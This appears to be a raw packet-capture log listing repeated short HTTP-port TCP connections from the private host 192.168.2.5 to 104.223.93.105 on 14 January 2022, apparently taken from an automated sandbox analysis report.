Jan 14, 2022 17:28:52.316239119 CET	49780	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:52.450566053 CET	80	49780	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:52.450705051 CET	49780	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:52.454046965 CET	49780	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:52.585603952 CET	80	49780	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:52.586828947 CET	49780	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:52.718008041 CET	80	49780	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:52.726126909 CET	80	49780	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:52.726289034 CET	80	49780	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:52.726356030 CET	49780	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:52.726402998 CET	49780	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:52.857363939 CET	80	49780	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:53.905137062 CET	49781	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:54.033015966 CET	80	49781	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:54.033145905 CET	49781	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:54.036242008 CET	49781	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:54.164078951 CET	80	49781	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:54.165677071 CET	49781	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:54.297138929 CET	80	49781	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:54.306258917 CET	80	49781	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:54.306274891 CET	80	49781	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:54.306515932 CET	49781	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:54.306545019 CET	49781	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:54.436880112 CET	80	49781	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:55.335737944 CET	49782	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:55.467268944 CET	80	49782	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:55.467441082 CET	49782	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:55.470160961 CET	49782	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:55.678710938 CET	80	49782	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:55.678987980 CET	49782	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:55.987972021 CET	80	49782	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:55.988012075 CET	80	49782	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:55.988030910 CET	80	49782	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:55.988131046 CET	49782	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:55.988158941 CET	49782	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:56.180638075 CET	80	49782	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:57.488420010 CET	49784	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:57.619528055 CET	80	49784	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:57.619621038 CET	49784	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:57.622553110 CET	49784	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:57.754616022 CET	80	49784	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:57.754698992 CET	49784	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:57.885791063 CET	80	49784	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:57.906794071 CET	80	49784	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:57.906833887 CET	80	49784	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:57.906898022 CET	49784	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:57.906938076 CET	49784	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:58.038292885 CET	80	49784	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:58.881587982 CET	49791	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:59.012422085 CET	80	49791	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:59.012537956 CET	49791	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:59.015616894 CET	49791	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:59.146652937 CET	80	49791	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:59.146729946 CET	49791	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:59.277570963 CET	80	49791	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:59.285082102 CET	80	49791	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:59.285120010 CET	80	49791	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:59.285311937 CET	49791	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:59.285377979 CET	49791	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:59.421504021 CET	80	49791	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:00.314524889 CET	49799	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:00.442375898 CET	80	49799	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:00.442667961 CET	49799	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:00.450387001 CET	49799	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:00.578258991 CET	80	49799	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:00.578438044 CET	49799	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:00.706531048 CET	80	49799	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:00.713493109 CET	80	49799	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:00.713527918 CET	80	49799	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:00.713673115 CET	49799	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:00.713725090 CET	49799	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:00.842001915 CET	80	49799	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:01.694536924 CET	49806	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:01.825788021 CET	80	49806	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:01.825921059 CET	49806	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:01.829359055 CET	49806	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:01.960571051 CET	80	49806	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:01.960654974 CET	49806	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:02.097992897 CET	80	49806	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:02.098814964 CET	80	49806	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:02.098882914 CET	80	49806	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:02.098968983 CET	49806	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:02.099055052 CET	49806	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:02.231448889 CET	80	49806	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:03.227760077 CET	49812	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:03.358958960 CET	80	49812	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:03.359405041 CET	49812	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:03.362296104 CET	49812	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:03.494137049 CET	80	49812	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:03.495379925 CET	49812	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:03.626449108 CET	80	49812	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:03.634512901 CET	80	49812	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:03.634674072 CET	80	49812	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:03.634721041 CET	49812	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:03.634771109 CET	49812	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:03.766113043 CET	80	49812	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:05.326889038 CET	49813	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:05.458482027 CET	80	49813	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:05.458592892 CET	49813	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:05.461335897 CET	49813	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:05.592381954 CET	80	49813	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:05.592464924 CET	49813	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:05.723618984 CET	80	49813	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:05.731496096 CET	80	49813	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:05.731534958 CET	80	49813	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:05.731650114 CET	49813	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:05.734685898 CET	49813	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:05.866110086 CET	80	49813	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:06.911814928 CET	49814	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:07.042866945 CET	80	49814	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:07.042985916 CET	49814	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:07.046101093 CET	49814	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:07.177078962 CET	80	49814	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:07.177156925 CET	49814	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:07.308312893 CET	80	49814	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:07.317964077 CET	80	49814	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:07.318008900 CET	80	49814	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:07.318098068 CET	49814	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:07.318128109 CET	49814	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:07.449525118 CET	80	49814	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:08.257332087 CET	49815	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:08.388482094 CET	80	49815	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:08.388613939 CET	49815	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:08.406847000 CET	49815	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:08.563863993 CET	80	49815	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:08.563952923 CET	49815	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:08.695035934 CET	80	49815	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:08.702689886 CET	80	49815	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:08.702734947 CET	80	49815	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:08.703206062 CET	49815	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:08.703252077 CET	49815	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:08.849548101 CET	80	49815	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:11.143611908 CET	49818	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:11.292938948 CET	80	49818	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:11.293068886 CET	49818	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:11.296372890 CET	49818	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:11.436073065 CET	80	49818	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:11.436233997 CET	49818	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:11.628108025 CET	80	49818	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:11.635201931 CET	80	49818	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:11.635256052 CET	80	49818	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:11.635457993 CET	49818	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:11.687051058 CET	49818	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:11.837625027 CET	80	49818	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:14.053426027 CET	49819	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:14.182974100 CET	80	49819	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:14.183109999 CET	49819	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:14.185842991 CET	49819	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:14.315392971 CET	80	49819	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:14.315494061 CET	49819	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:14.445136070 CET	80	49819	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:14.455641985 CET	80	49819	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:14.455688000 CET	80	49819	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:14.455787897 CET	49819	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:14.455833912 CET	49819	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:14.586028099 CET	80	49819	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:16.777295113 CET	49820	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:16.908338070 CET	80	49820	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:16.908457994 CET	49820	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:16.911808014 CET	49820	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:17.043977976 CET	80	49820	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:17.044059038 CET	49820	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:17.174981117 CET	80	49820	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:17.182404995 CET	80	49820	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:17.182430983 CET	80	49820	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:17.182506084 CET	49820	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:17.182579994 CET	49820	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:17.314208984 CET	80	49820	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:18.557315111 CET	49821	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:18.688576937 CET	80	49821	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:18.688699961 CET	49821	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:18.692194939 CET	49821	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:18.824660063 CET	80	49821	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:18.828167915 CET	49821	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:18.959274054 CET	80	49821	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:18.968348026 CET	80	49821	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:18.968466043 CET	49821	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:18.968631983 CET	80	49821	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:18.970637083 CET	49821	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:19.103039026 CET	80	49821	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:23.443322897 CET	49827	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:23.571463108 CET	80	49827	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:23.571633101 CET	49827	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:23.575057983 CET	49827	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:23.703248024 CET	80	49827	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:23.703351974 CET	49827	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:23.831353903 CET	80	49827	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:23.841211081 CET	80	49827	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:23.841245890 CET	80	49827	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:23.841418028 CET	49827	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:23.841512918 CET	49827	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:23.970092058 CET	80	49827	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:25.652314901 CET	49828	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:25.814377069 CET	80	49828	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:25.814495087 CET	49828	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:25.832127094 CET	49828	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:25.991565943 CET	80	49828	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:25.991719007 CET	49828	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:26.136554003 CET	80	49828	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:26.144282103 CET	80	49828	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:26.144332886 CET	80	49828	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:26.144412041 CET	49828	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:26.144459963 CET	49828	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:26.308155060 CET	80	49828	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:27.577704906 CET	49830	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:27.710798979 CET	80	49830	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:27.712193012 CET	49830	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:27.728215933 CET	49830	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:27.859571934 CET	80	49830	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:27.859743118 CET	49830	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:27.991045952 CET	80	49830	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:27.998682022 CET	80	49830	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:27.998769999 CET	80	49830	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:27.998852015 CET	49830	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:27.998883009 CET	49830	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:28.130565882 CET	80	49830	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:29.791400909 CET	49831	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:30.411508083 CET	80	49831	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:30.411834002 CET	49831	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:30.416867971 CET	49831	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:31.113785028 CET	80	49831	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:31.113910913 CET	49831	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:31.827024937 CET	80	49831	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:31.827066898 CET	80	49831	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:31.827090979 CET	80	49831	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:31.827214003 CET	49831	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:31.827270985 CET	49831	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:32.305907965 CET	80	49831	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:32.725241899 CET	49832	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:33.208076000 CET	80	49832	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:33.208307981 CET	49832	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:33.215694904 CET	49832	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:33.467137098 CET	80	49832	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:33.467804909 CET	49832	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:33.814976931 CET	80	49832	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:33.815031052 CET	80	49832	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:33.815071106 CET	80	49832	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:33.815299988 CET	49832	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:33.815355062 CET	49832	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:34.006656885 CET	80	49832	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:34.743413925 CET	49833	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:34.876569986 CET	80	49833	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:34.876717091 CET	49833	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:34.891024113 CET	49833	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:35.032488108 CET	80	49833	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:35.032548904 CET	49833	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:35.322788954 CET	80	49833	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:35.322861910 CET	80	49833	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:35.322911978 CET	80	49833	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:35.322973967 CET	49833	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:35.323007107 CET	49833	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:35.454479933 CET	80	49833	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:36.281523943 CET	49834	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:36.412668943 CET	80	49834	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:36.412847996 CET	49834	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:36.420886040 CET	49834	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:36.626245022 CET	80	49834	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:36.630243063 CET	49834	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:36.761486053 CET	80	49834	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:36.768083096 CET	80	49834	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:36.768170118 CET	80	49834	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:36.768271923 CET	49834	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:36.768309116 CET	49834	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:36.900177956 CET	80	49834	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:37.663517952 CET	49835	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:37.795056105 CET	80	49835	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:37.795165062 CET	49835	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:37.798758984 CET	49835	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:37.929831028 CET	80	49835	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:37.929960012 CET	49835	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:38.060945034 CET	80	49835	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:38.068783998 CET	80	49835	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:38.068809986 CET	80	49835	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:38.069020987 CET	49835	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:38.069129944 CET	49835	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:38.200614929 CET	80	49835	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:39.021749973 CET	49836	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:39.154042006 CET	80	49836	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:39.154122114 CET	49836	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:39.184763908 CET	49836	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:39.325189114 CET	80	49836	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:39.325314999 CET	49836	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:39.465979099 CET	80	49836	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:39.474395990 CET	80	49836	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:39.474411964 CET	80	49836	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:39.474653006 CET	49836	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:39.474744081 CET	49836	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:39.606048107 CET	80	49836	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:40.394260883 CET	49837	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:40.525208950 CET	80	49837	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:40.525302887 CET	49837	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:40.528047085 CET	49837	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:40.659876108 CET	80	49837	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:40.659979105 CET	49837	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:40.791409016 CET	80	49837	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:40.801172972 CET	80	49837	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:40.801276922 CET	80	49837	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:40.801367044 CET	49837	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:40.801409960 CET	49837	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:40.932847977 CET	80	49837	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:41.793672085 CET	49838	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:41.921430111 CET	80	49838	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:41.921638966 CET	49838	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:41.926429987 CET	49838	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:42.054713011 CET	80	49838	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:42.054831028 CET	49838	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:42.185022116 CET	80	49838	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:42.200709105 CET	80	49838	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:42.200754881 CET	80	49838	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:42.201318026 CET	49838	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:42.201406956 CET	49838	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:42.330058098 CET	80	49838	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:43.301310062 CET	49839	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:43.433999062 CET	80	49839	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:43.434129000 CET	49839	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:43.436918974 CET	49839	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:43.567825079 CET	80	49839	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:43.567903996 CET	49839	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:43.698954105 CET	80	49839	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:43.706233025 CET	80	49839	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:43.706258059 CET	80	49839	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:43.706347942 CET	49839	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:43.706410885 CET	49839	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:43.837604046 CET	80	49839	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:44.735109091 CET	49840	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:44.866266966 CET	80	49840	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:44.866420984 CET	49840	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:44.869754076 CET	49840	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:45.000961065 CET	80	49840	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:45.001187086 CET	49840	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:45.132246971 CET	80	49840	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:45.142271042 CET	80	49840	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:45.142313957 CET	80	49840	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:45.142442942 CET	49840	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:45.142590046 CET	49840	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:45.274022102 CET	80	49840	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:46.779309988 CET	49841	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:46.909118891 CET	80	49841	104.223.93.105	192.168.2.5
Jan 14, 2022 17:29:46.909290075 CET	49841	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:29:46.912807941 CET	49841	80	192.168.2.5	104.223.93.105
